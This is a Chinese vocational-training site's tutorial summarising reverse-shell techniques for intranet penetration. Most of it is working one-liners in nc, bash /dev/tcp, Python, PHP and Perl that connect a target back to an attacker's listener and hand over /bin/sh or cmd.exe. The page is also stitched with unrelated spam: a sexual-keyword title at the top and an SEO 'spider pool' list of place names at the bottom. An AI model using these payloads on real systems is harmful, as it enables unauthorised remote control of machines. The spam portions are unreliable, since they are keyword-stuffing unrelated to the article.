日韩欧乱色一区二区三区在线_久久―日本道色综合久久_欧美日本一区二区_网曝91综合精品门事件在线

千鋒教育-做有情懷、有良心、有品質的職業教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > 內網滲透:nc反彈shell總結

內網滲透:nc反彈shell總結

來源:千鋒教育
發布人:wjy
時間: 2022-09-22 10:08:07 1663812487

  1、實驗環境

  Kali:192.168.32.132 //模擬靶機

  Windows:192.168.32.1 //模擬公網vps

  2、若靶機上存在nc,獲取反向shell:

  vps攻擊機:nc -lvp 9999 // 監聽9999端口

  靶機:nc 1.1.1.1 9999 -e /bin/bash // Linux正向連接公網vps1.1.1.1的9999端口

  nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows

nc反彈shell總結1

  3、若靶機上不存在nc,可用如下幾種方式進行代替:

  (1) Bash反彈shell

  vps攻擊機:nc -lvp 6666靶機:bash -I >& /dev/tcp/192.168.32.1/6666 0>&1

nc反彈shell總結2

  (2)靶機存在Python環境,Python反彈shell

  vps攻擊機:nc -lvp 6666靶機:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.1",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc反彈shell總結3

  (3)靶機存在PHP環境,PHP反向shell:

  vps攻擊機:nc -lvp 6666靶機:php -r '$sock=fsockopen("192.168.32.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

nc反彈shell總結4

  (4)靶機存在Perl環境,Perl反彈shell:

  Vps攻擊機:nc -lvp 6666靶機:perl -e 'use Socket; $i="192.168.32.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'=

nc反彈shell總結5

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT
主站蜘蛛池模板: 辽宁省| 门源| 门头沟区| 鹤壁市| 宁化县| 陈巴尔虎旗| 昌宁县| 同德县| 紫金县| 西贡区| 泰兴市| 静海县| 孟村| 江川县| 尉氏县| 武汉市| 太白县| 灌云县| 两当县| 临夏市| 双城市| 余干县| 托里县| 兴文县| 巴里| 连平县| 义马市| 浦江县| 达日县| 井冈山市| 大城县| 叙永县| 湟源县| 满洲里市| 右玉县| 辽宁省| 吴江市| 治县。| 海安县| 盘锦市| 嫩江县|